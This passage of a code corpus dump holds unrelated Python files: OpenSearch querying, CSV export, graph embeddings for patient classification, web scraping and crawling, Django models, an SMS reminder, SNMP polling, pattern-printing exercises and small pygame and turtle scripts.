(OpenSearchIndices) Target index to be indexed\n :param document (dict) Document to index\n \"\"\"\n # TODO: Remove this IF after reindexing and unification of both indices\n if index in [OpenSearchIndices.MODULES, OpenSearchIndices.YINDEX]:\n try:\n document['module'] = document.pop('name')\n except KeyError:\n pass\n\n return self.opensearch.index(index=index.value, body=document, request_timeout=self.opensearch_request_timeout)\n\n def bulk_modules(self, index: OpenSearchIndices, chunk):\n for success, info in parallel_bulk(\n client=self.opensearch,\n actions=chunk,\n index=index.value,\n thread_count=self.threads,\n request_timeout=self.opensearch_request_timeout,\n ):\n if not success:\n self.logger.error(f'OpenSearch document failed with info: {info}')\n\n def match_all(self, index: OpenSearchIndices) -> dict:\n \"\"\"\n Return the dictionary of all modules that are in the index.\n\n Argument:\n :param index (OpenSearchIndices) Index in which to search\n \"\"\"\n\n def _store_hits(hits: list, all_results: dict):\n for hit in hits:\n name = ''\n revision = hit['_source']['revision']\n organization = hit['_source']['organization']\n try:\n name = hit['_source']['name']\n except KeyError:\n name = hit['_source']['module']\n new_path = f'/var/yang/all_modules/{name}@{revision}.yang'\n if not os.path.exists(new_path):\n self.logger.error(f'{new_path} does not exists')\n\n key = f'{name}@{revision}/{organization}'\n if key not in all_results:\n all_results[key] = hit['_source']\n\n all_results = {}\n match_all_query = {'query': {'match_all': {}}}\n total_index_docs = 0\n opensearch_result = self.opensearch.search(index=index.value, body=match_all_query, scroll=u'1m', size=250)\n scroll_id = opensearch_result.get('_scroll_id')\n hits = opensearch_result['hits']['hits']\n _store_hits(hits, all_results)\n total_index_docs += len(hits)\n\n while opensearch_result['hits']['hits']:\n opensearch_result = self.scroll(scroll_id)\n\n scroll_id = opensearch_result.get('_scroll_id')\n hits = opensearch_result['hits']['hits']\n _store_hits(hits, all_results)\n total_index_docs += len(hits)\n\n self.clear_scroll(scroll_id)\n return all_results\n\n def get_module_by_name_revision(self, index: OpenSearchIndices, module: dict) -> list:\n get_module_query = self._get_name_revision_query(index, module)\n\n opensearch_result = self.opensearch.search(index=index.value, body=get_module_query, size=1000)\n\n return opensearch_result['hits']['hits']\n\n def get_sorted_module_revisions(self, index: OpenSearchIndices, name: str):\n query_path = os.path.join(os.environ['BACKEND'], 'opensearch_indexing/json/sorted_name_rev_query.json')\n with open(query_path, encoding='utf-8') as reader:\n sorted_name_rev_query = json.load(reader)\n\n # TODO: Remove this IF after reindexing and unification of both indices\n if index in [OpenSearchIndices.MODULES, OpenSearchIndices.YINDEX]:\n del sorted_name_rev_query['query']['bool']['must'][0]['match_phrase']['name.keyword']\n sorted_name_rev_query['query']['bool']['must'][0]['match_phrase'] = {'module.keyword': {'query': name}}\n else:\n sorted_name_rev_query['query']['bool']['must'][0]['match_phrase']['name.keyword']['query'] = name\n\n try:\n es_result = self.opensearch.search(index=index.value, body=sorted_name_rev_query)\n except RequestError:\n return []\n\n return es_result['hits']['hits']\n\n def get_node(self, module: dict) -> dict:\n query_path = os.path.join(os.environ['BACKEND'], 'opensearch_indexing/json/show_node.json')\n with open(query_path, encoding='utf-8') as 
reader:\n show_node_query = json.load(reader)\n\n show_node_query['query']['bool']['must'][0]['match_phrase']['module.keyword']['query'] = module['name']\n show_node_query['query']['bool']['must'][1]['match_phrase']['path']['query'] = module['path']\n show_node_query['query']['bool']['must'][2]['match_phrase']['revision']['query'] = module['revision']\n hits = self.opensearch.search(index=OpenSearchIndices.YINDEX.value, body=show_node_query)\n\n return hits\n\n def generic_search(\n self,\n index: t.Union[OpenSearchIndices, str],\n query: dict,\n response_size: t.Optional[int] = 0,\n use_scroll: bool = False,\n ):\n index = index if isinstance(index, str) else index.value\n if use_scroll:\n return self.opensearch.search(\n index=index,\n body=query,\n request_timeout=self.opensearch_request_timeout,\n scroll=u'10m',\n size=response_size,\n )\n return self.opensearch.search(\n index=index,\n body=query,\n request_timeout=self.opensearch_request_timeout,\n size=response_size,\n )\n\n def clear_scroll(self, scroll_id: str):\n return self.opensearch.clear_scroll(scroll_id=scroll_id, ignore=(404,))\n\n def scroll(self, scroll_id: str):\n return self.opensearch.scroll(\n scroll_id=scroll_id,\n scroll=u'10m',\n request_timeout=self.opensearch_request_timeout,\n )\n\n def document_exists(self, index: OpenSearchIndices, module: dict) -> bool:\n \"\"\"\n Check whether 'module' already exists in index - if count is greater than 0.\n\n Arguments:\n :param index (OpenSearchIndices) Index in which to search\n :param module (dict) Document to search\n \"\"\"\n if index == OpenSearchIndices.DRAFTS:\n get_query = self._get_draft_query(index, module)\n else:\n get_query = self._get_name_revision_query(index, module)\n\n try:\n es_count = self.opensearch.count(index=index.value, body=get_query)\n except RequestError:\n return False\n\n return es_count['count'] > 0\n\n def _get_name_revision_query(self, index: OpenSearchIndices, module: dict) -> dict:\n module_search_path = os.path.join(os.environ['BACKEND'], 'opensearch_indexing/json/module_search.json')\n with open(module_search_path, encoding='utf-8') as reader:\n name_revision_query = json.load(reader)\n\n # TODO: Remove this IF after reindexing and unification of both indices\n if index in [OpenSearchIndices.MODULES, OpenSearchIndices.YINDEX]:\n del name_revision_query['query']['bool']['must'][0]['match_phrase']['name.keyword']\n name_revision_query['query']['bool']['must'][0]['match_phrase'] = {\n 'module.keyword': {'query': module['name']},\n }\n else:\n name_revision_query['query']['bool']['must'][0]['match_phrase']['name.keyword']['query'] = module['name']\n name_revision_query['query']['bool']['must'][1]['match_phrase']['revision']['query'] = module['revision']\n\n return name_revision_query\n\n def _get_draft_query(self, index: OpenSearchIndices, draft: dict) -> dict:\n draft_search_path = os.path.join(os.environ['BACKEND'], 'opensearch_indexing/json/draft_search.json')\n with open(draft_search_path, encoding='utf-8') as reader:\n draft_query = json.load(reader)\n\n draft_query['query']['bool']['must'][0]['match_phrase']['draft']['query'] = draft['draft']\n return draft_query\n","sub_path":"opensearch_indexing/opensearch_manager.py","file_name":"opensearch_manager.py","file_ext":"py","file_size_in_byte":16026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"416105465","text":"import sys\r\nimport csv\r\nfrom main import *\r\n\r\ndef make_excel(out_file): \r\n with open(out_file, mode='wt', 
newline='') as out_file:\r\n        w = csv.writer(out_file) #,delimiter=',')\r\n        for x in children_list:\r\n            col1 = x.first_name\r\n            col2 = x.last_name\r\n            col3 = x.age()\r\n            col4 = x.gender\r\n            col5 = x.address\r\n            col6 = x.trustee_list[0].first_name\r\n            col7 = x.trustee_list[0].last_name\r\n            col8 = x.trustee_list[0].phone\r\n            line = [col1, col2, col3, col4, col5, col6, col7, col8]\r\n            w.writerow(line)\r\n\r\nif __name__ == \"__main__\":\r\n    out_file = sys.argv[1]\r\n    result = make_excel(out_file)","sub_path":"original_csv.py","file_name":"original_csv.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"8994883","text":"import networkx as nx\nimport pandas as pd\nimport numpy as np\nimport random\nfrom tqdm import tqdm\n\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import classification_report\nfrom sklearn.neural_network import MLPClassifier\n\n\nrandom.seed(2)\n\nkg = pd.read_csv(\"./data/syndrome9.csv\")\nG = nx.from_pandas_edgelist(kg, 'syndrome', 'symptom', edge_attr=None, create_using=nx.Graph())\n\npatient1 = pd.read_excel('./data/crf1_4_10.xlsx')\npatient2 = pd.read_excel('./data/crf2_4_10.xlsx')\n\nname = list(patient1.columns)[8: ]\nprint('Patient symptom names:', name)\n\nkg_name = list(set(list(kg['syndrome']) + list(kg['symptom'])))\nprint('Knowledge-graph node names:', kg_name)\n\n# fill missing values with 0\ndef padnan(metrix):\n    for i in range(metrix.shape[0]):\n        for j in range(metrix.shape[1]):\n            if np.isnan(metrix[i, j]):\n                metrix[i, j] = 0\n    return metrix\n\npatient1 = padnan(np.array(patient1))\npatient2 = padnan(np.array(patient2))\n\npatient = np.concatenate((patient1, patient2), axis = 0)\nprint('Patient feature matrix:', patient.shape)\n\npatient = list(patient)\n# randnum = random.randint(0, 100)\nrandnum = 2 # 2,4,7,11\nrandom.seed(randnum)\nrandom.shuffle(patient)\npatient = np.array(patient)\n\n# split into train / validation / test sets\ntrain_patient = patient[0: int(len(patient)*0.6)]\nval_patient = patient[int(len(patient)*0.6): int(len(patient)*0.8)]\ntest_patient = patient[int(len(patient)*0.8): ]\n\n# augment the negative-class samples\ntrain_patient_neg = []\nfor i in range(len(train_patient[:, 0:4])):\n    if list(train_patient[:, 0:4][i]).index(max(train_patient[:, 0:4][i])) != 1:\n        train_patient_neg.append(train_patient[i])\n\ntrain_patient_neg = np.array(1 * train_patient_neg) # duplicate once\ntrain_patient = np.concatenate((train_patient, train_patient_neg), axis = 0)\n\nprint('Training samples:', len(train_patient))\nprint('Validation samples:', len(val_patient))\nprint('Test samples:', len(test_patient))\n\npatient = np.concatenate((train_patient, val_patient, test_patient), axis = 0)\n\n# convert one-hot labels to integers\nlabel = patient[:, 0:4]\npatient_label = []\nfor i in range(len(label)):\n    patient_label.append(list(label[i]).index(max(label[i])))\n\nfor i in range(len(patient_label)):\n    if patient_label[i] != 1:\n        patient_label[i] = 0\n\npatient_feat = patient[:, 8:]\n# print(patient_feat)\n\n# map the patient symptom matrix to symptom names\npatient_feat_name = []\nfor i in range(len(patient_feat)):\n    temp = []\n    for j in range(len(patient_feat[i])):\n        if patient_feat[i, j] != 0:\n            temp.append(name[j])\n    patient_feat_name.append(temp)\n\nprint(patient_feat_name)\n\ndef get_randomwalk(node, path_length):\n    random_walk = [node]\n\n    for i in range(path_length - 1):\n        temp = list(G.neighbors(node))\n        temp = list(set(temp) - set(random_walk))\n        if len(temp) == 0:\n            break\n\n        random_node = random.choice(temp)\n        random_walk.append(random_node)\n        node = random_node\n\n    return random_walk\n\n# 
print(get_randomwalk('space exploration', 10))\n\n# get list of all nodes from the graph\nall_nodes = list(G.nodes())\n\nrandom_walks = []\nfor n in tqdm(all_nodes):\n    for i in range(5):\n        random_walks.append(get_randomwalk(n, 10))\n\n# count of sequences\nprint(len(random_walks))\nprint('random_walks list:', random_walks)\n\nfrom gensim.models import Word2Vec\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\nmodel = Word2Vec(size=16, window = 10, sg = 1, hs = 0,\n                 negative = 10, # for negative sampling\n                 alpha=0.03, min_alpha=0.0007, workers = 1,\n                 seed = 2)\n\nmodel.build_vocab(random_walks, progress_per=2)\n\nmodel.train(random_walks, total_examples = model.corpus_count, epochs=50, report_delay=1)\n\n# terms = list(G.nodes)\n\n# print('***', model.wv.vectors)\nprint('气虚血瘀', model.wv['气虚血瘀'])\n\nembeddings = {}\nfor i in range(len(kg_name)):\n    embeddings[kg_name[i]] = model.wv[kg_name[i]]\n\n# print(embeddings)\n\n# print(embeddings['气虚血瘀'])\n\npatient_embed = []\nfor i in range(len(patient_feat_name)):\n    temp = []\n    for j in range(len(patient_feat_name[i])):\n        if patient_feat_name[i][j] in embeddings.keys():\n            temp.append(embeddings[patient_feat_name[i][j]].reshape(1, -1))\n    patient_embed.append(np.array(temp).mean(0))\n\npatient_embed = np.array(patient_embed).squeeze()\n\nprint(patient_embed.shape)\n\ntrain_X = patient_embed[: 360]\ntrain_Y = patient_label[: 360]\n\ntest_X = patient_embed[360 + 89:]\ntest_Y = patient_label[360 + 89:]\n\nmlp = MLPClassifier(hidden_layer_sizes=(), max_iter=150, random_state=2)\n\nmlp.fit(train_X, train_Y)\n\npred = mlp.predict(test_X)\nprint('Accuracy:', accuracy_score(pred, test_Y))\n\nconf_mat = confusion_matrix(test_Y, pred)\nprint('Confusion matrix:', conf_mat)\n\nprint(classification_report(test_Y, pred))","sub_path":"DeepWalk_embedding.py","file_name":"DeepWalk_embedding.py","file_ext":"py","file_size_in_byte":4850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"501773922","text":"from gd_utils import get_tree_from_str\n\ndef read_interval_file(filename):\n    gt_list, st_list = [], []\n    try:\n        t = [line.strip() for line in open(filename, \"r\").readlines() if len(line.strip()) and line.strip()[0] != '#']\n        gt_list, st_list = t[1:-1], t[-1]\n    except IOError as e:\n        print(filename, \" I/O error({0}): {1}\".format(e.errno, e.strerror))\n        quit()\n    return gt_list, st_list\n\n\ndef check(species, genetreelist):\n    counter = 0\n    for g in genetreelist:\n        ok = False\n        gt = get_tree_from_str(g)\n        leaves = [x.name for x in gt.get_terminals()]\n        if species[0] in leaves:\n            ok = True\n        if species[1] in leaves:\n            ok = True\n        if ok:\n            counter = counter + 1\n    return counter\n\n\nif __name__ == \"__main__\":\n    gtl, st = read_interval_file(\"tests/treefam.txt\")\n    stree = get_tree_from_str(st)\n    species = [x.name for x in stree.get_terminals()]\n\n    # for s in species:\n    #     print(s, check([s], gtl))\n    print(check([\"ORYSA\",\"ARATH\"], gtl))","sub_path":"gd_io.py","file_name":"gd_io.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"613528437","text":"import requests\nimport bs4\n'''\npip install lxml # lxml parser - needs to be installed but not imported ---only if using lxml as parser rather than html.parser\n\nhttps://stackoverflow.com/questions/46490626/getting-all-links-from-a-page-beautiful-soup\n\n'''\nurl = 'http://www.acontecaeventos.com.br/marketing-promocional-sao-paulo'\nr = requests.get(url)\nhtml_content = 
r.text\nsoup = bs4.BeautifulSoup(html_content, 'html.parser') # or 'lxml'\nlinks = soup.find_all('a')\n\nfor link in links:\n print(type(link)) # returns \n print(link)\n print(link['href'])\n #print(link.get('href')) #same","sub_path":"Projects/Intro_and_ATBSwPy/web_scraping2.py","file_name":"web_scraping2.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"622480543","text":"from django.db import models\nfrom pages.models import BaseModule\nfrom pages.models import BasePanel\n\nfrom filer.fields.image import FilerImageField\n\n\nclass SingleVideoModule(BaseModule):\n\t@property\n\tdef module_type(self):\n\t\treturn \"single-video\"\n\n\timage = FilerImageField(null=True, blank=True)\n\tvideo_embed = models.TextField()\n\nclass DoubleVideoModule(BaseModule):\n\t@property\n\tdef module_type(self):\n\t\treturn \"double-video\"\n\n\timage_01 = FilerImageField(related_name=\"image_01_set\", null=True, blank=True)\n\tvideo_01_embed = models.TextField()\n\tvideo_01_title = models.CharField(max_length=50)\n\n\timage_02 = FilerImageField(related_name=\"image_02_set\", null=True, blank=True)\n\tvideo_02_embed = models.TextField()\n\tvideo_02_title = models.CharField(max_length=50)","sub_path":"django/vfestival/apps/videos/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"217663101","text":"import signal\nimport json\nimport socket\nimport sys\nimport subprocess\nfrom threading import Thread\nimport time as timer\n\n#this function is copied and pasted, no shit I mean....\ndef text2int(textnum, numwords={}):\n if not numwords:\n units = [\n \"zero\", \"one\", \"two\", \"three\", \"four\", \"five\", \"six\", \"seven\", \"eight\",\n \"nine\", \"ten\", \"eleven\", \"twelve\", \"thirteen\", \"fourteen\", \"fifteen\",\n \"sixteen\", \"seventeen\", \"eighteen\", \"nineteen\",\n ]\n\n tens = [\"\", \"\", \"twenty\", \"thirty\", \"forty\", \"fifty\", \"sixty\", \"seventy\", \"eighty\", \"ninety\"]\n\n scales = [\"hundred\", \"thousand\", \"million\", \"billion\", \"trillion\"]\n\n numwords[\"and\"] = (1, 0)\n for idx, word in enumerate(units): numwords[word] = (1, idx)\n for idx, word in enumerate(tens): numwords[word] = (1, idx * 10)\n for idx, word in enumerate(scales): numwords[word] = (10 ** (idx * 3 or 2), 0)\n\n ordinal_words = {'first':1, 'second':2, 'third':3, 'fifth':5, 'eighth':8, 'ninth':9, 'twelfth':12}\n ordinal_endings = [('ieth', 'y'), ('th', '')]\n\n textnum = textnum.replace('-', ' ')\n\n current = result = 0\n for word in textnum.split():\n if word in ordinal_words:\n scale, increment = (1, ordinal_words[word])\n else:\n for ending, replacement in ordinal_endings:\n if word.endswith(ending):\n word = \"%s%s\" % (word[:-len(ending)], replacement)\n\n if word not in numwords:\n raise Exception(\"Illegal word: \" + word)\n\n scale, increment = numwords[word]\n\n current = current * scale + increment\n if scale > 100:\n result += current\n current = 0\n return result + current\n\ndef wait_and_process(time):\n print(\"IN THREAD 4 REAL\")\n timer.sleep(time)\n bash_command = 'python send_sms.py \"Here is your reminder from Dylan!\"'\n output = subprocess.check_output(bash_command, shell=True)\n\ndef remind_me(live_command):\n index = live_command.find('remind me')\n print(live_command)\n print(len(live_command))\n delay = live_command[index + 10:].split(' ')\n print(delay[0] 
+ \" \" + delay[1])\n try:\n time = text2int(delay[0])\n unit = delay[1]\n if unit.find('second') != -1:\n th = Thread(target = wait_and_process, args =[time])\n th.start()\n elif unit.find('minute') != -1:\n total = time * 60\n th = Thread(target = wait_and_process, args=[total])\n th.start()\n elif unit.find('hour') != -1:\n total = time*3600\n th = Thread(target = wait_and_process, args=[total])\n th.start()\n\n\n except Exception as e:\n print(\"problem occured with the remind me function\")\n\nprint(\"start!!!!!!!!!\")\n\nremind_me(\"remind me five seconds\")\nremind_me(\"remind me one minute\")\n","sub_path":"server/test_sms.py","file_name":"test_sms.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"45665877","text":"import re\nimport time\nimport datetime\nimport queue\nimport random\nimport urllib\nimport urllib.robotparser\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nimport downloader\n\n\ndef crawl_links(seed_url, link_regex=None, delay=5, max_depth=-1, max_urls=-1, num_retries=1, cache=None):\n \"\"\"\n \"\"\"\n crawl_queue = [seed_url]\n \n seen = {seed_url:0}\n\n num_urls = 0\n rp = get_robot(seed_url)\n DL = downloader.downloader(delay=delay, num_retries=num_retries, cache=cache)\n\n while crawl_queue:\n url = crawl_queue.pop()\n depth = seen.get(url, -2)\n user_agent = downloader.USER_AGENT[random.randrange(0, len(downloader.USER_AGENT))]\n if rp.can_fetch(user_agent.get('User-Agent'), url):\n html = DL(url)\n links = []\n\n if depth != max_depth:\n if link_regex:\n links.extend(link for link in get_links(html) if re.search(link_regex, link))\n\n for link in links:\n link = normalize(seed_url, link)\n \n if link not in seen:\n seen[link] = depth + 1\n\n if same_domain(seed_url, link):\n crawl_queue.append(link)\n\n num_urls += 1\n if num_urls == max_urls:\n break\n else:\n downloader.show_msg('Blocked by robots.txt: ', url)\n \n pass\n\n\ndef get_robot(seed_url):\n \"\"\"返回robots.txt的解析对象\n \"\"\"\n # robot_parse = urllib.robotparser.RobotFileParser()\n robot_parse = urllib.robotparser.RobotFileParser()\n robot_parse.set_url(urllib.parse.urljoin(seed_url, '/robots.txt'))\n robot_parse.read()\n return robot_parse\n\n\ndef normalize(seed_url, link):\n \"\"\"去除链接干扰项\n \"\"\"\n parse_result = urllib.parse.urlparse(link)\n return urllib.parse.urljoin(seed_url, parse_result.path)\n\n\ndef same_domain(url1, url2):\n \"\"\"如果两个网址属于同一网站,返回True\n \"\"\"\n return urllib.parse.urlparse(url1).netloc == urllib.parse.urlparse(url2).netloc\n\n\ndef get_links(html):\n \"\"\"通过正则匹配获取链接\n \"\"\"\n webpage_regex = re.compile(r'.*?', re.S)\n return webpage_regex.findall(html)\n\n\nif __name__ == \"__main__\":\n crawl_links('http://example.webscraping.com', '/(index|view)', delay=0, num_retries=1, max_depth=1)","sub_path":"practice/python_spider/Chapter_three/crawl_s3.py","file_name":"crawl_s3.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"285245777","text":"# import python modules\nimport os, random\nimport pandas as pd \nimport numpy as np \nimport cv2\n\ndatabase_path = \"~/laptop/present_work/pediatric_bone_age/database/rsna_bone_age\"\ntrain_label = \"train_label.csv\"\ntest_label = \"test_label.csv\"\n\ntrain_df = pd.read_csv(os.path.join(database_path, train_label))\nprint(train_df.head())\n\npid = list(train_df[\"id\"])\nage = list(train_df[\"boneage\"])\nmale = 
list(train_df[\"male\"])\n\n# getting the length of all column\nprint(len(pid)) # 12,611\nprint(len(age)) # 12,611\nprint(len(male))# 12,611\n# foudn no missing value\n\n\ntrain_df['gender'] = train_df['male'].map(lambda x: 'male' if x else 'female')\nboneage_mean = train_df['boneage'].mean()\nboneage_div = 2*train_df['boneage'].std()\n\n# we don't want normalization for now\nboneage_mean = 0\nboneage_div = 1.0\ntrain_df['boneage_zscore'] = train_df['boneage'].map(lambda x: (x-boneage_mean)/boneage_div)\ntrain_df.dropna(inplace = True)\nprint(train_df.sample(3))\n","sub_path":"src/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"641237081","text":"import json\n\nfrom django.contrib.gis.db import models\n\n\nclass StateCensusTract(models.Model):\n \"\"\"\n This model represents the shapefile for census tracts per state. This\n model is auto-generated using the ogrinspect Django command.\n \"\"\"\n\n statefp = models.CharField(max_length=2)\n countyfp = models.CharField(max_length=3)\n tractce = models.CharField(max_length=6)\n geoid = models.CharField(max_length=11, unique=True)\n name = models.CharField(max_length=7)\n namelsad = models.CharField(max_length=20)\n mtfcc = models.CharField(max_length=5)\n funcstat = models.CharField(max_length=1)\n aland = models.FloatField()\n awater = models.FloatField()\n intptlat = models.CharField(max_length=11)\n intptlon = models.CharField(max_length=12)\n geom = models.MultiPolygonField(srid=4269)\n\n minlat = models.FloatField(db_index=True)\n maxlat = models.FloatField(db_index=True)\n minlon = models.FloatField(db_index=True)\n maxlon = models.FloatField(db_index=True)\n geojson = models.TextField()\n\n objects = models.GeoManager()\n\n def __str__(self):\n return '%s (county: %s, state: %s)' % (\n self.namelsad, self.countyfp, self.statefp)\n\n def auto_fields(self):\n \"\"\"Populate the min and max lat/lon based on this object's geometry;\n also pre-compute a geojson representation for this model\"\"\"\n lons, lats = zip(*[pt for polygon in self.geom.coords\n for line in polygon\n for pt in line])\n self.minlat = min(lats)\n self.maxlat = max(lats)\n self.minlon = min(lons)\n self.maxlon = max(lons)\n\n # geometry is a placeholder, as we'll be inserting a pre-serialized\n # json string\n geojson = {\"type\": \"Feature\", \"geometry\": \"$_$\"}\n geojson['properties'] = {\n 'statefp': self.statefp,\n 'countyfp': self.countyfp,\n 'tractce': self.tractce,\n 'geoid': self.geoid,\n 'name': self.name,\n 'namelsad': self.namelsad,\n 'aland': self.aland,\n 'awater': self.awater,\n 'intptlat': self.intptlat,\n 'intptlon': self.intptlon,\n 'minlat': self.minlat,\n 'maxlat': self.maxlat,\n 'minlon': self.minlon,\n 'maxlon': self.maxlon\n }\n geojson = json.dumps(geojson)\n geojson = geojson.replace(\n '\"$_$\"',\n self.geom.simplify(preserve_topology=True).geojson)\n self.geojson = geojson\n\n def save(self):\n self.auto_fields()\n super(StateCensusTract, self).save()\n\n\n# Auto-generated `LayerMapping` dictionary for CensusTract model\ncensustract_mapping = {\n 'statefp': 'STATEFP',\n 'countyfp': 'COUNTYFP',\n 'tractce': 'TRACTCE',\n 'geoid': 'GEOID',\n 'name': 'NAME',\n 'namelsad': 'NAMELSAD',\n 'mtfcc': 'MTFCC',\n 'funcstat': 'FUNCSTAT',\n 'aland': 'ALAND',\n 'awater': 'AWATER',\n 'intptlat': 'INTPTLAT',\n 'intptlon': 'INTPTLON',\n 'geom': 
'MULTIPOLYGON',\n}\n","sub_path":"institutions/geo/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"378154902","text":"#3.1\nn = int(input(\"Enter the value of n:\"))\n\nfor i in range(1,n+1):\n    for j in range(i):\n        print(\"*\",end='') \n    print(\"\")\n\n#3.2\nn = int(input(\"Enter the value of n:\"))\n\nfor i in range(1,n+1):\n    for j in range(n,i,-1):\n        print(\" \",end='') \n    for k in range(i):\n        print(\"*\",end='')\n    print(\"\") \n\n#3.3\nn = int(input(\"Enter the value of n:\"))\n\nfor i in range(n): \n    for j in range(n-1,i,-1):\n        print(\" \",end='')\n    print(\"*\",end='')\n    for j in range(i+(i-1)):\n        print(\" \",end='')\n    if i >= 1:\n        print(\"*\")\n    elif i == 0:\n        print(\"\") \n\n#3.4\nn = int(input(\"Enter the value of n:\"))\n\ni=0\nreverse = False\n\nwhile(i >= 0):\n    if n == 1:\n        print(\"*\")\n        break\n\n    for j in range(i):\n        print(\" \",end='')\n    print(\"*\",end='')\n    for k in range(n-2-2*i):\n        print(\" \" if n>2 else '',end='')\n    print(\"*\" if i == 0 or i != int(n/2) else '',end='')\n    \n    print(\"\")\n    \n    if(not reverse):\n        i += 1 \n    elif(reverse):\n        i -= 1\n    \n    if n%2 == 0 and i == n/2 and not reverse:\n        i -= 1\n        reverse = True\n    elif i == int(n/2) and not reverse:\n        reverse = True\n\n\nn = int(input(\"Enter the value of n:\"))\n\ni=0\nreverse = False\n\nwhile(i >= 0):\n    if n == 1:\n        print(\"*\")\n        break\n    \n    for j in range(n-1,i-1,-1):\n        print(\" \",end='')\n    for k in range(2*i+1):\n        print(\"*\",end='') \n    print(\"\")\n    \n    if(not reverse):\n        i += 1 \n    elif(reverse):\n        i -= 1\n    \n    if n%2 == 0 and i == n/2 and not reverse:\n        i -= 1\n        reverse = True\n    elif i == int(n/2) and not reverse:\n        reverse = True\n\nn = int(input(\"Enter the value of n:\"))\n\ni=0\nreverse = False\n\nwhile(i >= 0):\n    for j in range(n-2,i-1,-1):\n        if not reverse:\n            print(\"A\",end='')\n        else:\n            print(\"C\",end='')\n    print(\"+\",end='') \n    for k in range(2*(i-1)+1):\n        print(\"E\",end='') \n\n    print(\"+\" if i > 0 else \"\",end='')\n    \n    for j in range(n-2,i-1,-1):\n        if not reverse:\n            print(\"B\",end='')\n        else:\n            print(\"D\",end='')\n\n    print(\"\")\n    if(not reverse):\n        i += 1 \n    elif(reverse):\n        i -= 1\n    \n    if i > n-1:\n        i = n - 2\n        reverse = True\n\n\n#4\n# the difference between else and finally is that the else clause\n# executes only if the try block doesn't raise an exception,\n# whereas the finally clause always executes when leaving the try block.\n\ndef divide(x,y):\n    try:\n        result = x/y\n    except ZeroDivisionError:\n        print(\"division by zero\")\n    else:\n        print(\"The result:\",result)\n    finally:\n        print(\"Finally clause\")\n\ndivide(2,1)\ndivide(2,0)\ndivide(\"2\",\"1\")","sub_path":"patterns.py","file_name":"patterns.py","file_ext":"py","file_size_in_byte":2740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"79838402","text":"from pysnmp.entity.rfc3413.oneliner import cmdgen\n\n\ncmdGen = cmdgen.CommandGenerator()\n\n\n# 1.3.6.1.2.1.2.2.1.10.2\n\n# (1, 3, 6, 1, 2, 1, 4, 20, 1, 1)\ndef get(ip):\n    errorIndication, errorStatus, errorIndex, varBinds = cmdGen.bulkCmd(\n        cmdgen.CommunityData('chinalife-rw'),\n        cmdgen.UdpTransportTarget((ip, 161)),\n        0, 25,\n        (1, 3, 6, 1, 2, 1, 4, 20)\n\n    )\n    if errorIndication:\n        print(ip + '---' + str(errorIndication))\n    else:\n        for var in varBinds:\n            if '2.'+ip in str(var[0]):\n                print('1.3.6.1.2.1.2.2.1.10.'+str(var[0])[-1:])\n\n\n# 
get('1.180.143.238')\nget('124.135.9.42')\n","sub_path":"test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"593818307","text":"import pygame\r\n\r\nfrom widget import Widget\r\n\r\nclass Menu (Widget):\r\n    \"\"\"\r\n    Class defining a text menu of options that a user may select and execute.\r\n    \"\"\"\r\n    def __init__(self,rect):\r\n        super(Menu,self).__init__(rect)\r\n        \r\n        self.options = [] # A list of (widget,method,*arg) tuples.\r\n        \r\n        self.add_mouse_handler(self.click, pygame.MOUSEBUTTONDOWN, 1, 1)\r\n        self.add_mouse_handler(self.click, pygame.MOUSEBUTTONDOWN, 3, 3)\r\n        \r\n    def do_nothing(self):\r\n        pass\r\n    \r\n    def add_option(self, widget, method=None,*arguments):\r\n        if method == None:\r\n            method = self.do_nothing\r\n        widget.rect = (widget.x0,widget.y0,widget.width,widget.height)\r\n        self.options.append((widget,method,arguments))\r\n        \r\n    def _tick(self,deltaTime):\r\n        super(Menu,self)._tick(deltaTime)\r\n        for (widget,_,_) in self.options:\r\n            widget._tick(deltaTime)\r\n        self.update()\r\n        \r\n    def click(self,button):\r\n        (mouseX, mouseY) = pygame.mouse.get_pos()\r\n        (mouseX, mouseY) = (mouseX - self.x0, mouseY - self.y0)\r\n        for (widget, method, args) in self.options:\r\n            if pygame.Rect(widget.rect).collidepoint(mouseX, mouseY):\r\n                method(*args)\r\n                return True\r\n    \r\n    def _draw(self):\r\n        super(Menu,self)._draw()\r\n        \r\n        for (widget, _, _) in self.options:\r\n            widget._draw()\r\n            self.surface.blit(widget.surface, (widget.x0, widget.y0) )\r\n\r\n\r\n    ","sub_path":"duelfieldstars/ui/ui_abstract/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"590121374","text":"#Blinking turtle for introductory programming lab\n\nimport turtle\n\ndef main():\n    numSides = 8\n    daniel = turtle.Turtle() #Set up a turtle named \"daniel\"\n    myWin = turtle.Screen() #The graphics window\n\n    #Draw a regular polygon\n    for i in 